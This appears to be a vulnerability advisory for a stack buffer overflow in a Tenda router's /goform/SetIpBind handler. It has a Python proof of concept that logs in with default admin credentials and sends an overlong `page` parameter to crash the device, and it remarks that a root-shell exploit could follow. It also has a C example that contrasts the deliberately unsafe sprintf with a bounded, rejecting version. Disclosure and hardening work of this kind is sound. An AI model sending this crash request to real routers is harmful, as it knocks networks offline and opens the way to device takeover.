- Manufacturer's address: https://www.tenda.com.cn/
- Firmware download address: https://www.tenda.com.cn/download/detail-2218.html
In /goform/SetIpBind, the `page` parameter is spliced into the stack buffer `s` by sprintf. There is no size check on the parameter, so an overlong value overflows the stack buffer (a stack overflow vulnerability).
```python
import requests

# Overlong value for the `page` parameter of /goform/SetIpBind
cmd = b'page=' + b'a' * 0x3000
url = b"http://192.168.10.103/login/Auth"
payload = b"http://192.168.10.103/goform/SetIpBind/?" + cmd
data = {
    "username": "admin",
    "password": "admin",
}

def attack():
    s = requests.session()
    # Log in first so the session is accepted by the goform handler
    resp = s.post(url=url, data=data)
    print(resp.content)
    # Send the request with the overlong page parameter
    resp = s.post(url=payload, data=data)
    print(resp.content)

attack()
```
You can see that the router crashed; from there an exp could be written to get a root shell.
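The root cause is the unbounded sprintf into `s`. The following is an added example, not Tenda's firmware code: a hypothetical handler showing the unsafe splice the advisory describes next to a bounded version that rejects an overlong `page` value before it reaches the buffer. The buffer size `S_BUF_LEN` is assumed; the real size is not given on the page.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the stack buffer `s`; the firmware's real size is not on the page. */
#define S_BUF_LEN 64
/* The pattern the advisory describes: sprintf copies the whole `page` value
 * into a fixed stack buffer with no length check, so a long value overflows. */
void splice_page_unsafe(char *s, const char *page)
{
    sprintf(s, "page=%s", page);
}

/* Hardened: refuse the request when the result would not fit, then use a
 * bounded write. Returns the formatted length, or -1 on rejection. */
int splice_page_safe(char *s, size_t s_len, const char *page)
{
    if (s == NULL || page == NULL)
        return -1;
    size_t need = strlen("page=") + strlen(page) + 1; /* +1 for the NUL */
    if (need > s_len)
        return -1; /* overlong parameter: reject, do not truncate silently */
    int n = snprintf(s, s_len, "page=%s", page);
    return (n < 0 || (size_t)n >= s_len) ? -1 : n;
}

/* Helper: build a `page` value of `len` 'a' bytes (as the PoC does) and report
 * whether the hardened handler accepts it (1) or rejects it (0). */
int accepts_page_of_length(size_t len)
{
    char s[S_BUF_LEN];
    char *page = malloc(len + 1);
    if (page == NULL)
        return 0;
    memset(page, 'a', len);
    page[len] = '\0';
    int ok = splice_page_safe(s, sizeof s, page) >= 0;
    free(page);
    return ok;
}

int main(void)
{
    char s[S_BUF_LEN];
    splice_page_unsafe(s, "1"); /* a short value fits either way */
    printf("1 byte accepted: %d\n", accepts_page_of_length(1));
    printf("0x3000 bytes accepted: %d\n", accepts_page_of_length(0x3000));
    return 0;
}
```

The same length check belongs at the point where the query string is parsed, so that no handler ever receives a parameter larger than the buffer it is written into.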